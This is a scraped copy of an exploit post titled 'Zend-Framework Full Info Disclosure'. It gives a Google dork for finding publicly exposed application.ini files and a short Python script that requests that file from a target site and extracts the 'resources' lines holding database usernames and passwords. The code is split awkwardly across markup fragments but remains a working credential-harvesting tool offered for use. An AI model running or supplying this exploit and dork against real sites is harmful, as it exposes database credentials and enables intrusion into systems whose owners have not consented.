天天看點

Zend-Framework - Full Info Disclosure

<code># Exploit Title : Zend-Framework Full Info Disclosure</code>

<code># Google Dork : inurl:/application/configs/application.ini</code>

<code># Date : 26/11/2013</code>

<code># Exploit Author : Ariel Orellana</code>

<code># Vendor Homepage : http://framework.zend.com/</code>

<code># Category : Web applications</code>

<code># Tested on : GNU/Linux</code>

<code> </code> 

<code>#[Comment]Greetz : Daniel Godoy</code>

<code>#[PoC] :</code>

<code>#The username and password of the database may be obtained trough the "application.ini" file</code>

<code>#Vulnerable page : http://target.com/application/configs/application.ini</code>

<code>#!/usr/bin/python</code>

<code>import</code>

<code>string</code>

<code>re</code>

<code>from</code>

<code>urllib2</code><code>import</code>

<code>Request, urlopen</code>

<code>disc</code><code>=</code>

<code>"/application/configs/application.ini"</code>

<code>url</code><code>=</code>

<code>raw_input</code> <code>(</code><code>"URL: "</code><code>)</code>

<code>req</code><code>=</code>

<code>Request(url</code><code>+</code><code>disc)</code>

<code>rta</code><code>=</code>

<code>urlopen(req)</code>

<code>print</code>

<code>"Result"</code>

<code>html</code><code>=</code>

<code>rta.read()</code>

<code>rdo</code><code>=</code>

<code>str</code><code>(re.findall(</code><code>"resources.*=*"</code><code>, html))</code>

<code>rdo</code>

<code>exit</code>